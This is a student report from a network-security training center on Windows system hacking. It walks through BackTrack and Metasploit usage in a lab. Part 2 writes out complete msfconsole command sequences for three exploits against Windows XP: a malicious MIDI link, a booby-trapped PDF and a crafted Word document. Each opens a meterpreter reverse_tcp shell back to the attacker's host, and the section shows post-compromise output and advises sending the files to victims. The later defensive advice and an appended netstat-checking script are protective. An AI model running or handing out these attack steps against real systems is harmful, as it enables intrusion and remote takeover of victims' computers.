TOPIC: SYSTEM HACKING
Student: Hoàng Thanh Quý

PREFACE

According to statistics from Bkav, from the beginning of 2013 until now, 2,405 websites belonging to agencies and enterprises in Vietnam have been compromised, an average of about 300 websites attacked each month. Mr. Vũ Ngọc Sơn, Bkav's Vice President in charge of Research and Development, said that the attacks on agencies and enterprises cover almost the full range, from less serious to serious and very serious (aimed at stealing confidential documents), and that this malware targets even the Ministry of Public Security, the Ministry of National Defense, banks, research agencies and units, and enterprises. In Bkav's assessment, there have been attack campaigns that spread malware and deliberately target Vietnam.

Meanwhile, network attacks and intrusions into information technology systems for the purposes of espionage, profiteering, data destruction, theft of assets and unfair competition, along with other digital information security incidents, are increasing at an alarming rate in number, becoming more varied in form and more sophisticated in technology.

Given this situation, together with issuing Directive 897/CT-TTg, the Prime Minister directed ministries, sectors and localities to strengthen measures for ensuring digital information security. The Prime Minister also stated clearly that in recent times the digital information security situation in our country has developed in complex ways, with many threats that seriously endanger the application of information technology to socio-economic development and to national defense and security.

This report gives an overview of the methods hackers use to attack, break into and exploit versions of the Windows operating system, the most widely used operating system in Vietnam today. It aims to help us understand how hackers operate and to offer measures that help every user stay safe and secure in today's Internet age.

Hoàng Thanh Quý.

ACKNOWLEDGEMENTS

In carrying out and completing this project, I would first like to thank my teacher Võ Đỗ Thắng, the instructor supervising interns at the ATHENA International Center for Network Administration and Network Security Training, for his dedicated guidance over this period. I would also like to thank the colleagues and friends who shared their experience and made it possible for me to complete this project. Mistakes are unavoidable in a project like this one; I hope that the teachers at the ATHENA center and my friends will give me frank feedback so that I can learn from it in future research and development work.

Hoàng Thanh Quý.

PART 1: INTRODUCTION

1.1 System Hacking and the State of Network Security in Vietnam

System hacking covers techniques for obtaining usernames and passwords by relying on software installed on the system or on how easily remote services of the Windows operating system can be installed and run, as well as escalating privileges on the system, using keyloggers to capture information, and deleting system log files. Once inside a system, a hacker can do anything on that computer, with extremely serious consequences for individuals and organizations.

1.2 Commonly Exploited Vulnerabilities in the Windows Operating System

Computer software today is extremely complex and comprises thousands of lines of code. Software is written by people, so it is no surprise that it contains programming errors, known as vulnerabilities. Hackers use these vulnerabilities to break into systems, and malware authors use them to start their programs automatically on your computer.

More and more security vulnerabilities are being discovered in operating systems, web servers and other software. Vendors continually track these vulnerabilities and release new versions after patching the vulnerabilities of earlier versions. Users must therefore keep themselves informed and upgrade the old version they are using; otherwise hackers will take advantage of it to attack the system. The forums of well-known vendors usually post updates on security vulnerabilities, and how those vulnerabilities are exploited depends on the individual.

Microsoft makes notable security improvements with every new version of the Windows operating system. The fact remains, however, that network threats are evolving faster than Microsoft's cycle of updating and renewing the operating system. Cybercriminals often use vulnerabilities in program code to gain access to data and resources on computers that have a security flaw. Malicious programs designed specifically to exploit these vulnerabilities, a technique known as an exploit, are spreading rapidly. Microsoft products that frequently have security vulnerabilities include the Windows operating system, Internet Explorer, Windows Server, Microsoft Exchange and .NET Framework.

1.3 The Process of Attacking a System

We first look at the overall process of a system attack. The target in front of us is a computer system. The steps to attack it and bring it down can be listed as in the accompanying figure. The process has 6 stages:

- Enumerate: extract all available information about the users on the system. SNMP probing is used to obtain more useful and more accurate information.
- Crack: this stage is probably the one that appeals most to hackers. It requires cracking a user's login password. Or, by some other means, the goal to be reached is access to the system.
- Escalate: put simply, moving the access level from an ordinary user up to admin or to a user with higher privileges.
- Execute: run applications on the target machine. Malware, a keylogger or a rootkit is prepared in advance to run on the attacked computer.
- Hide: the executables and source code files that run the program need to be hidden so that the target does not detect and remove them.
- Tracks: this of course means not leaving tracks. Information related to you has to be erased completely, with nothing left behind. Otherwise the likelihood of being detected as the intruder is very high.

In summary, the system attack process (system hacking) is the step that follows reconnaissance and information gathering on the target, which uses techniques such as Footprinting, Social engineering, Enumeration and Google Hacking to find information. Once the target system has been identified, we begin the actual attack on the system. Various techniques have to be carried out to get into the system and do what we want there, such as deleting data or running trojans and keyloggers.

PART 2: USING BACKTRACK TO EXPLOIT AND BREAK INTO SYSTEMS ON A LAN

2.1 The BackTrack 5 R3 Operating System

BackTrack is a Linux distribution in Live DVD form, developed for penetration testing. BackTrack is a merger of 3 different Linux penetration testing distributions: IWHAX, WHOPPIX and Auditor. In its current version (5), BackTrack is based on the Ubuntu 11.10 Linux distribution.

The BackTrack toolset has a fairly long development history across several different Linux versions. The current version uses the Slackware Linux distribution (Tomas M. (www.slax.org)). BackTrack continually updates its tools and drivers. BackTrack currently has more than 300 tools for security research. BackTrack combines 2 very well-known security testing toolkits, Whax and Auditor.

BackTrack 5 contains a number of tools that can be used during our penetration testing. The penetration testing tools in BackTrack 5 can be classified as follows:

- Information gathering: this category contains tools that can be used to obtain information about a target's DNS, routing, e-mail addresses, websites, mail servers and so on. This information can be collected from what is already available on the Internet, without touching the target environment.
- Network mapping: this category contains tools that can be used to check for live hosts and to obtain information about the OS and the applications used by the target, as well as to do port scanning.
- Vulnerability identification: in this category we find tools for scanning vulnerabilities (general) and vulnerabilities in Cisco devices. It also contains tools for performing and analyzing Server Message Block (SMB) and Simple Network Management Protocol (SNMP).
- Web application analysis: this category contains tools that can be used for monitoring and auditing web applications.
- Radio network analysis: to check wireless networks, Bluetooth and radio frequency identification (RFID), we can use the tools in this category.
- Penetration: this category contains tools that can be used to exploit the vulnerabilities found on target machines.
- Privilege escalation: after exploiting vulnerabilities and gaining access to target machines, we can use the tools in this category to raise our privileges to the highest level.
- Maintaining access: the tools in this category help us maintain access to target machines. We may need to obtain the highest privileges before we can install tools to maintain access.
- Voice Over IP (VOIP): to analyze VOIP we can use the tools in this category.
- Digital forensics: in this category we find tools that can be used for forensic analysis, such as acquiring hard disk images, examining file structures and analyzing hard disk images. To use the tools in this category, we can choose Start Backtrack Forensics in the boot menu. It is sometimes necessary to mount the internal hard disk and the swap files in read-only mode to preserve integrity.
- Reverse engineering: this category contains tools that can be used to debug a program or disassemble an executable file.

BackTrack 5 can be downloaded from: www.backtracklinux.org/downloads/

2.2 Metasploit

Metasploit is a computer security project that provides information about security vulnerabilities and supports penetration testing and the development of network intrusion detection systems. The Metasploit Framework is an environment used to test, attack and exploit flaws in services. Metasploit is built from the object-oriented language Perl, with components written in C, assembler and Python. Metasploit runs on most operating systems: Linux, Windows and MacOS. It can be downloaded from www.metasploit.com.

Metasploit supports several user interfaces:

- Console interface: use the msfconsole command. The msfconsole interface is driven by command lines for configuration and testing, so it is faster and more flexible.
- Web interface: use msfweb, which interacts with the user through a web interface.
- Command line interface: use msfcli.

Metasploit environment:

- Global environment: set through the two commands setg and unsetg. Options assigned here are global and are applied to all exploit modules.
- Temporary environment: set through the two commands set and unset. This environment is applied only to the exploit module currently loaded and does not affect other exploit modules.

The configured environment can be saved with the save command. It is stored in ./msf/config and loaded again when the user interface is started.

Using the Metasploit Framework:

a) Select the exploit module: choose the vulnerable program or service that Metasploit supports exploiting.
    show exploits: lists the exploit modules the framework supports.
    use exploit_name: selects an exploit module.
    info exploit_name: shows information about an exploit module.
   We should regularly update the service flaws and the modules from www.metasploit.com, or with the msfupdate command, or with svn update /opt/metasploit/msf3/.

b) Configure the selected exploit module:
    show options: shows which options need to be configured.
    set: configures the options of the module.
   Some modules also have advanced options, which can be viewed by typing the command show advanced.

c) Verify the options just configured:
    check: checks whether the options have been set correctly.

d) Select the target:
    show targets: lists the targets provided by the module.
    set: specifies which target to use.

e) Select the payload:
    show payloads: lists the payloads of the current exploit module.
    info payload_name: shows detailed information about a payload.
    set payload payload_name: specifies the payload module name. After selecting a payload, use show options to see the options of that payload.
    show advanced: shows the advanced options of that payload.

g) Run the exploit:
    exploit: the command that executes the payload code. The payload then provides us with information about the exploited system.

2.3 Overview of a LAN

In a local LAN, computers are usually connected to one another over short physical distances, such as within a room, a floor, a building or a company. Computers on a LAN can share resources with one another, typically files, printers, scanners and some other devices. When a computer is on the LAN, it can use network scanning programs to learn the IP addresses of the hosts on the network.

Nmap (Network Mapper) is a free, open-source utility for network discovery and security auditing. Nmap and Zenmap (the graphical front end for nmap) come preinstalled in BackTrack. They use IP packets to determine which hosts are available on the network, which services (application name and version) those hosts offer, which operating systems (and OS versions) they are running, what kind of packet filter or firewall is in use, and many other characteristics. Nmap runs on all operating systems, and official binary packages are available for Linux, Windows and Mac OS X.

After identifying the hosts on the network, we can use vulnerability scanning tools to identify the vulnerabilities of the system we want to break into, and then exploit them to gain access to the system. One of these vulnerability scanners is Nessus, which can be downloaded from http://www.nessus.org/.

Once the intrusion has succeeded and full control of the system has been obtained, the hacker can do anything on the victim's machine, such as downloading and uploading files, changing the system structure, running programs, stealing passwords, and installing a trojan or backdoor.

2.4 Breaking Into and Exploiting Windows XP

2.4.1 Vulnerability used: Ms12_004

Start msfconsole from a BackTrack terminal window. Declare the vulnerability to use and set the options:

    search ms12_004
    use exploit/windows/browser/ms12_004_midi
    show options
    set SRVHOST 192.168.159.128
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST 192.168.159.128
    exploit

BackTrack creates a link containing the malicious code (http://192.168.159.128:4444). The victim only has to click this link; BackTrack then automatically sends the malicious code to the victim's machine, after which it is possible to view information on the victim's machine and take control of it.

Proceed to exploit the victim's machine, which has IP 192.168.159.130, port 1078:

    sessions
    sessions -i 1
    getuid
    sysinfo

Hacked: the ms12_004 flaw was exploited successfully on WinXP SP2. Victim:

    Computer: QUYDONGN 3B5D9F
    OS: Windows XP (Build 2600, Service Pack 2)
    Architecture: x86
    System language: en US
    Meterpreter: x86/win32

2.4.2 Vulnerability used through a PDF file

Start msfconsole from a BackTrack terminal window. Declare the vulnerability to use and set the options:

    search nojs
    use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs
    show options
    set FILENAME hack.pdf
    set payload windows/meterpreter/reverse_tcp
    set LHOST 192.168.136.128
    set LPORT 4444
    exploit

BackTrack reports that it has successfully created a file hack.pdf in the directory /root/ms4/local/.

    use multi/handler
    set payload windows/meterpreter/reverse_tcp
    set LHOST 192.168.136.128
    exploit

BackTrack reports that it is ready for the attack. We send the hack.pdf file created earlier to the victim. If the victim opens hack.pdf, BackTrack sends the malicious code to the victim's machine to obtain information and take control of the victim's machine.

BackTrack reports that 1 session has opened the file hack.pdf, namely the machine with IP address 192.168.136.128, port 1037, and that it has sent 752128 of the malicious code file to the victim's machine. Next we check the information of the victim's machine:

    sysinfo

Hacked: exploited successfully through the PDF file flaw on WinXP SP2. Victim:

    Computer: HUUANHH 9091FB1
    OS: Windows XP (Build 2600, Service Pack 2)
    Architecture: x86
    System language: en US
    Meterpreter: x86/win32

2.4.3 Vulnerability used through a Word 2007 file

Start msfconsole from a BackTrack terminal window. Declare the vulnerability to use and set the options:

    search ms12_027
    use exploit/windows/fileformat/ms12_027_mscomctl_bof
    show options
    set FILENAME hack.doc
    set payload windows/meterpreter/reverse_tcp
    set LHOST 192.168.1.104
    exploit

BackTrack reports that it has successfully created a file hack.pdf in the directory /root/ms4/local/.

    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set LHOST 192.168.1.104
    exploit

BackTrack reports that it is ready for the attack. We send the hack.doc file created earlier to the victim. If the victim opens hack.doc, BackTrack sends the malicious code to the victim's machine to obtain information and take control of the victim's machine.

BackTrack reports that 1 session has opened the file hack.doc, namely the machine with IP address 192.168.1.104, port 4444, and that it has sent 752128 of the malicious code file to the victim's machine. Next we check the information of the victim's machine:

    sysinfo

Hacked: exploited successfully through the Word 2007 file flaw on WinXP SP2. Victim:

    Computer: QUYDONGN 3B5D9F
    OS: Windows XP (Build 2600, Service Pack 2)
    Architecture: x86
    System language: en US
    Meterpreter: x86/win32

PART 3: CONCLUSION

For system attacks that rely on mistakes made while using the computer or on physical security flaws, the following methods reduce and prevent password theft by hackers:

- Passwords must be longer than 8 characters and must combine uppercase letters, lowercase letters, digits and special characters, so that cracking programs have difficulty guessing them.
- Configure the registry so that passwords on a Windows system are hashed and stored only in NTLM form, so that cracking programs have difficulty recovering them. Set the following key to 1: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash.
- Admin users should delete the sam file in the Windows/repair directory after each data backup made with rdisk.

When using the computer to access the Internet, users should note the following:

- Do not open e-mail attachments whose origin is unclear or untrusted.
- Make sure that you have a firewall and that it is turned on for your system.
- Make sure that your Windows installation is updated regularly and that your security software has a live update function (automatic online updating).

Microsoft has built a series of tools into Windows so that administrators and experienced users can analyze their computer to see whether it has been compromised. When users suspect that their computer has been broken into, they can use these tools to check the computer themselves when it shows suspicious signs: WMIC, the net commands, Openfiles, Netstat and Find.
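
The Netstat check recommended above, as an added example that is not part of the original report: this Python script parses `netstat -ano` output and flags established outbound TCP sessions to ports outside an allowlist, which is how the reverse_tcp sessions of section 2.4 appear on the victim's machine. The sample output is constructed (its addresses mirror the lab in section 2.4.1), and the allowlist and function name are assumptions.

```python
import ipaddress
import re

# Constructed `netstat -ano` output (not from the report); the addresses
# mirror the lab in section 2.4.1: victim .130, attacker .128 on port 4444.
SAMPLE = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       948
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       1004
  TCP    127.0.0.1:1029         127.0.0.1:1030         ESTABLISHED     1500
  TCP    192.168.159.130:3389   192.168.159.1:50211    ESTABLISHED     1004
  TCP    192.168.159.130:1036   192.168.159.2:80       ESTABLISHED     1320
  TCP    192.168.159.130:1078   192.168.159.128:4444   ESTABLISHED     2716
  UDP    0.0.0.0:500            *:*                                    700
"""

# Assumption: remote ports this workstation legitimately talks to; tune per site.
EXPECTED_REMOTE_PORTS = {53, 80, 88, 135, 139, 389, 443, 445}

# One IPv4 TCP row: local addr:port, remote addr:port, state, owning PID.
ROW = re.compile(
    r"^\s*TCP\s+(?P<lip>[\d.]+):(?P<lport>\d+)\s+"
    r"(?P<rip>[\d.]+):(?P<rport>\d+)\s+(?P<state>[A-Z_]+)\s+(?P<pid>\d+)\s*$"
)

def suspicious_connections(netstat_text, expected=EXPECTED_REMOTE_PORTS):
    """Return established outbound TCP sessions to ports outside the allowlist."""
    rows = [m for m in map(ROW.match, netstat_text.splitlines()) if m]
    # Sessions on a port this host listens on are inbound, not call-backs.
    listening = {int(m["lport"]) for m in rows if m["state"] == "LISTENING"}
    findings = []
    for m in rows:
        lport, rport = int(m["lport"]), int(m["rport"])
        remote = ipaddress.ip_address(m["rip"])
        if m["state"] != "ESTABLISHED" or lport in listening:
            continue
        if rport in expected or remote.is_loopback:
            continue
        findings.append({
            "local": f"{m['lip']}:{lport}",
            "remote": f"{remote}:{rport}",
            "pid": int(m["pid"]),  # look this PID up with WMIC or tasklist
            "lan_peer": remote.is_private,
        })
    return findings

if __name__ == "__main__":
    for f in suspicious_connections(SAMPLE):
        print(f"PID {f['pid']}: {f['local']} -> {f['remote']} LAN={f['lan_peer']}")
```

Only IPv4 TCP rows are parsed; a flagged row is a lead for the other tools named above, not proof of compromise.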